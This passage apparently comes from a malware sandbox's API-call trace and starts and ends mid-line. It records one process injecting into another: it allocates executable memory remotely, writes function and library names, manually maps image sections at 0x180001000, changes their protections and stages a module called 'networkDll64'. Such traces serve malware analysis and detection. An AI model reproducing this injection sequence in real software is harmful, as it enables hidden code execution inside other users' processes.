[0190.126] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda30*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9e8 | out: lpBuffer=0xcda30*, lpNumberOfBytesWritten=0xcd9e8*=0xd8) returned 1 [0190.126] ResetEvent (hEvent=0x640) returned 1 [0190.126] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0190.126] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda30, nSize=0xd8, lpNumberOfBytesRead=0xcd9e8 | out: lpBuffer=0xcda30*, lpNumberOfBytesRead=0xcd9e8*=0xd8) returned 1 [0190.127] VirtualFreeEx (hProcess=0x730, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.127] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf570 | out: hHeap=0x2150000) returned 1 [0190.127] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.127] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acfa50 | out: hHeap=0x2150000) returned 1 [0190.127] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0190.127] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0190.127] lstrlenA (lpString="RtlFreeHeap") returned 11 [0190.127] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0190.128] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32adb192*, nSize=0xc, lpNumberOfBytesWritten=0xcdac8 | out: lpBuffer=0x32adb192*, lpNumberOfBytesWritten=0xcdac8*=0xc) returned 1 [0190.128] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0190.128] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf3c0 [0190.128] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0190.128] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x1e0000, lpBuffer=0x32acf3c0*, nSize=0x20, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0x32acf3c0*, lpNumberOfBytesWritten=0xcd9d8*=0x20) returned 1 [0190.129] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesWritten=0xcd9d8*=0xd8) returned 1 [0190.129] ResetEvent (hEvent=0x640) returned 1 [0190.129] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0190.129] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0190.130] VirtualFreeEx (hProcess=0x730, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.130] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf3c0 | out: hHeap=0x2150000) returned 1 [0190.130] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.130] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0190.130] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0190.130] lstrlenA (lpString="RtlAllocateHeap") returned 15 [0190.130] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0190.131] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32adb16c*, nSize=0x10, lpNumberOfBytesWritten=0xcdac8 | out: lpBuffer=0x32adb16c*, lpNumberOfBytesWritten=0xcdac8*=0x10) returned 1 [0190.131] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0190.131] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf3c0 [0190.131] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0190.131] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x1e0000, lpBuffer=0x32acf3c0*, nSize=0x20, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0x32acf3c0*, lpNumberOfBytesWritten=0xcd9d8*=0x20) returned 1 [0190.132] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesWritten=0xcd9d8*=0xd8) returned 1 [0190.132] ResetEvent (hEvent=0x640) returned 1 [0190.132] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0190.132] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0190.132] VirtualFreeEx (hProcess=0x730, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.133] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf3c0 | out: hHeap=0x2150000) returned 1 [0190.133] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.133] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0190.133] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0190.133] lstrlenA (lpString="RtlReAllocateHeap") returned 17 [0190.133] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0190.133] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32adb17e*, nSize=0x12, lpNumberOfBytesWritten=0xcdac8 | out: lpBuffer=0x32adb17e*, lpNumberOfBytesWritten=0xcdac8*=0x12) returned 1 [0190.135] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0190.135] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf3c0 [0190.135] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0190.136] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x1e0000, lpBuffer=0x32acf3c0*, nSize=0x20, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0x32acf3c0*, lpNumberOfBytesWritten=0xcd9d8*=0x20) returned 1 [0190.136] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesWritten=0xcd9d8*=0xd8) returned 1 [0190.136] ResetEvent (hEvent=0x640) returned 1 [0190.136] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0190.137] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0190.137] VirtualFreeEx (hProcess=0x730, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.137] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf3c0 | out: hHeap=0x2150000) returned 1 [0190.137] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.137] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0190.137] GetProcAddress (hModule=0x7ffb26230000, lpProcName="LoadLibraryW") returned 0x7ffb262550f0 [0190.138] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32adb1c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12 [0190.138] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf3c0 [0190.138] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32adb1c8, cbMultiByte=-1, lpWideCharStr=0x32acf3c0, cchWideChar=12 | out: lpWideCharStr="SHLWAPI.dll") returned 12 [0190.138] lstrlenW (lpString="SHLWAPI.dll") returned 11 [0190.138] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0190.138] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32acf3c0*, nSize=0x18, lpNumberOfBytesWritten=0xcdad8 | out: lpBuffer=0x32acf3c0*, lpNumberOfBytesWritten=0xcdad8*=0x18) returned 1 [0190.138] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda30, nSize=0xd8, lpNumberOfBytesRead=0xcd9e8 | out: lpBuffer=0xcda30*, lpNumberOfBytesRead=0xcd9e8*=0xd8) returned 1 [0190.138] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf840 [0190.138] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0190.139] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x1e0000, lpBuffer=0x32acf840*, nSize=0x18, lpNumberOfBytesWritten=0xcd9e8 | out: lpBuffer=0x32acf840*, lpNumberOfBytesWritten=0xcd9e8*=0x18) returned 1 [0190.139] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda30*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9e8 | out: lpBuffer=0xcda30*, lpNumberOfBytesWritten=0xcd9e8*=0xd8) returned 1 [0190.139] ResetEvent (hEvent=0x640) returned 1 [0190.139] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0190.140] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda30, nSize=0xd8, lpNumberOfBytesRead=0xcd9e8 | out: lpBuffer=0xcda30*, lpNumberOfBytesRead=0xcd9e8*=0xd8) returned 1 [0190.140] VirtualFreeEx (hProcess=0x730, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.140] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf840 | out: hHeap=0x2150000) returned 1 [0190.140] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.140] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf3c0 | out: hHeap=0x2150000) returned 1 [0190.140] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0190.141] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0190.141] lstrlenA (lpString="StrFormatByteSizeW") returned 18 [0190.141] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x13, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0190.141] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32adb1b4*, nSize=0x13, lpNumberOfBytesWritten=0xcdac8 | out: lpBuffer=0x32adb1b4*, lpNumberOfBytesWritten=0xcdac8*=0x13) returned 1 [0190.141] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0190.141] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf9c0 [0190.141] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0190.142] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x1e0000, lpBuffer=0x32acf9c0*, nSize=0x20, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0x32acf9c0*, lpNumberOfBytesWritten=0xcd9d8*=0x20) returned 1 [0190.142] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesWritten=0xcd9d8*=0xd8) returned 1 [0190.144] ResetEvent (hEvent=0x640) returned 1 [0190.144] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0190.144] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0190.144] VirtualFreeEx (hProcess=0x730, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.144] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf9c0 | out: hHeap=0x2150000) returned 1 [0190.144] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.145] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0190.145] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0190.145] lstrlenA (lpString="StrStrA") returned 7 [0190.145] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0190.145] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32adb1aa*, nSize=0x8, lpNumberOfBytesWritten=0xcdac8 | out: lpBuffer=0x32adb1aa*, lpNumberOfBytesWritten=0xcdac8*=0x8) returned 1 [0190.146] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0190.146] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf4e0 [0190.146] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0190.146] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x1e0000, lpBuffer=0x32acf4e0*, nSize=0x20, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0x32acf4e0*, lpNumberOfBytesWritten=0xcd9d8*=0x20) returned 1 [0190.146] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesWritten=0xcd9d8*=0xd8) returned 1 [0190.147] ResetEvent (hEvent=0x640) returned 1 [0190.147] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0190.147] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0190.147] VirtualFreeEx (hProcess=0x730, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.147] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf4e0 | out: hHeap=0x2150000) returned 1 [0190.147] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.147] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0190.148] GetProcAddress (hModule=0x7ffb26230000, lpProcName="LoadLibraryW") returned 0x7ffb262550f0 [0190.148] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32adb1d4, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0190.148] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf3c0 [0190.148] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32adb1d4, cbMultiByte=-1, lpWideCharStr=0x32acf3c0, cchWideChar=13 | out: lpWideCharStr="ACTIVEDS.dll") returned 13 [0190.148] lstrlenW (lpString="ACTIVEDS.dll") returned 12 [0190.148] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0190.148] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32acf3c0*, nSize=0x1a, lpNumberOfBytesWritten=0xcdad8 | out: lpBuffer=0x32acf3c0*, lpNumberOfBytesWritten=0xcdad8*=0x1a) returned 1 [0190.148] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda30, nSize=0xd8, lpNumberOfBytesRead=0xcd9e8 | out: lpBuffer=0xcda30*, lpNumberOfBytesRead=0xcd9e8*=0xd8) returned 1 [0190.149] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf3f0 [0190.149] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0190.149] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x1e0000, lpBuffer=0x32acf3f0*, nSize=0x18, lpNumberOfBytesWritten=0xcd9e8 | out: lpBuffer=0x32acf3f0*, lpNumberOfBytesWritten=0xcd9e8*=0x18) returned 1 [0190.149] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda30*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9e8 | out: lpBuffer=0xcda30*, lpNumberOfBytesWritten=0xcd9e8*=0xd8) returned 1 [0190.150] ResetEvent (hEvent=0x640) returned 1 [0190.150] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0190.174] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda30, nSize=0xd8, lpNumberOfBytesRead=0xcd9e8 | out: lpBuffer=0xcda30*, lpNumberOfBytesRead=0xcd9e8*=0xd8) returned 1 [0190.174] VirtualFreeEx (hProcess=0x730, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.174] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf3f0 | out: hHeap=0x2150000) returned 1 [0190.175] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.175] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf3c0 | out: hHeap=0x2150000) returned 1 [0190.175] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0190.175] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0190.176] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0190.176] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf840 [0190.176] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0190.176] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32acf840*, nSize=0x20, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0x32acf840*, lpNumberOfBytesWritten=0xcd9d8*=0x20) returned 1 [0190.176] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesWritten=0xcd9d8*=0xd8) returned 1 [0190.177] ResetEvent (hEvent=0x640) returned 1 [0190.177] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0190.177] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0190.177] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.177] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf840 | out: hHeap=0x2150000) returned 1 [0190.178] VirtualAllocEx (hProcess=0x730, lpAddress=0x180001000, dwSize=0x4a00, flAllocationType=0x1000, flProtect=0x4) returned 0x180001000 [0190.178] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x4a00) returned 0x32e8a230 [0190.178] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x180001000, lpBuffer=0x32e8a230*, nSize=0x4a00, lpNumberOfBytesWritten=0xcdcd8 | out: lpBuffer=0x32e8a230*, lpNumberOfBytesWritten=0xcdcd8*=0x4a00) returned 1 [0190.178] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x180001000, lpBuffer=0x32ad4ee0*, nSize=0x4a00, lpNumberOfBytesWritten=0xcdcd8 | out: lpBuffer=0x32ad4ee0*, lpNumberOfBytesWritten=0xcdcd8*=0x4a00) returned 1 [0190.179] VirtualAllocEx (hProcess=0x730, lpAddress=0x180006000, dwSize=0x1c00, flAllocationType=0x1000, flProtect=0x4) returned 0x180006000 [0190.179] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e8a230, Size=0x1c00) returned 0x32e8a230 [0190.179] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x180006000, lpBuffer=0x32e8a230*, nSize=0x1c00, lpNumberOfBytesWritten=0xcdcd8 | out: lpBuffer=0x32e8a230*, lpNumberOfBytesWritten=0xcdcd8*=0x1c00) returned 1 [0190.180] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x180006000, lpBuffer=0x32ad98e0*, nSize=0x1c00, lpNumberOfBytesWritten=0xcdcd8 | out: lpBuffer=0x32ad98e0*, lpNumberOfBytesWritten=0xcdcd8*=0x1c00) returned 1 [0190.180] VirtualAllocEx (hProcess=0x730, lpAddress=0x180008000, dwSize=0x200, flAllocationType=0x1000, flProtect=0x4) returned 0x180008000 [0190.180] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e8a230, Size=0x200) returned 0x32e8a230 [0190.180] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x180008000, lpBuffer=0x32e8a230*, nSize=0x200, lpNumberOfBytesWritten=0xcdcd8 | out: lpBuffer=0x32e8a230*, lpNumberOfBytesWritten=0xcdcd8*=0x200) returned 1 [0190.181] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x180008000, lpBuffer=0x32adb4e0*, nSize=0x200, lpNumberOfBytesWritten=0xcdcd8 | out: lpBuffer=0x32adb4e0*, lpNumberOfBytesWritten=0xcdcd8*=0x200) returned 1 [0190.181] VirtualAllocEx (hProcess=0x730, lpAddress=0x180009000, dwSize=0x600, flAllocationType=0x1000, flProtect=0x4) returned 0x180009000 [0190.181] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e8a230, Size=0x600) returned 0x32e8a230 [0190.181] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x180009000, lpBuffer=0x32e8a230*, nSize=0x600, lpNumberOfBytesWritten=0xcdcd8 | out: lpBuffer=0x32e8a230*, lpNumberOfBytesWritten=0xcdcd8*=0x600) returned 1 [0190.184] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x180009000, lpBuffer=0x32adb6e0*, nSize=0x600, lpNumberOfBytesWritten=0xcdcd8 | out: lpBuffer=0x32adb6e0*, lpNumberOfBytesWritten=0xcdcd8*=0x600) returned 1 [0190.184] VirtualProtectEx (in: hProcess=0x730, lpAddress=0x180001000, dwSize=0x4860, flNewProtect=0x20, lpflOldProtect=0xcdce4 | out: lpflOldProtect=0xcdce4*=0x4) returned 1 [0190.185] VirtualProtectEx (in: hProcess=0x730, lpAddress=0x180006000, dwSize=0x1a2d, flNewProtect=0x2, lpflOldProtect=0xcdce4 | out: lpflOldProtect=0xcdce4*=0x4) returned 1 [0190.185] VirtualProtectEx (in: hProcess=0x730, lpAddress=0x180008000, dwSize=0xb0, flNewProtect=0x4, lpflOldProtect=0xcdce4 | out: lpflOldProtect=0xcdce4*=0x4) returned 1 [0190.185] VirtualProtectEx (in: hProcess=0x730, lpAddress=0x180009000, dwSize=0x4c8, flNewProtect=0x2, lpflOldProtect=0xcdce4 | out: lpflOldProtect=0xcdce4*=0x4) returned 1 [0190.185] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcdb80, nSize=0xd8, lpNumberOfBytesRead=0xcdb38 | out: lpBuffer=0xcdb80*, lpNumberOfBytesRead=0xcdb38*=0xd8) returned 1 [0190.185] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65030 [0190.185] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0190.185] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32e65030*, nSize=0x28, lpNumberOfBytesWritten=0xcdb38 | out: lpBuffer=0x32e65030*, lpNumberOfBytesWritten=0xcdb38*=0x28) returned 1 [0190.186] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcdb80*, nSize=0xd8, lpNumberOfBytesWritten=0xcdb38 | out: lpBuffer=0xcdb80*, lpNumberOfBytesWritten=0xcdb38*=0xd8) returned 1 [0190.186] ResetEvent (hEvent=0x640) returned 1 [0190.186] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0190.186] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcdb80, nSize=0xd8, lpNumberOfBytesRead=0xcdb38 | out: lpBuffer=0xcdb80*, lpNumberOfBytesRead=0xcdb38*=0xd8) returned 1 [0190.187] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.187] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65030 | out: hHeap=0x2150000) returned 1 [0190.187] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e8a230 | out: hHeap=0x2150000) returned 1 [0190.187] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad4ae0 | out: hHeap=0x2150000) returned 1 [0190.187] lstrlenA (lpString="networkDll64") returned 12 [0190.187] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0190.187] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32e80c50*, nSize=0xd, lpNumberOfBytesWritten=0xce298 | out: lpBuffer=0x32e80c50*, lpNumberOfBytesWritten=0xce298*=0xd) returned 1 [0190.188] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x40) returned 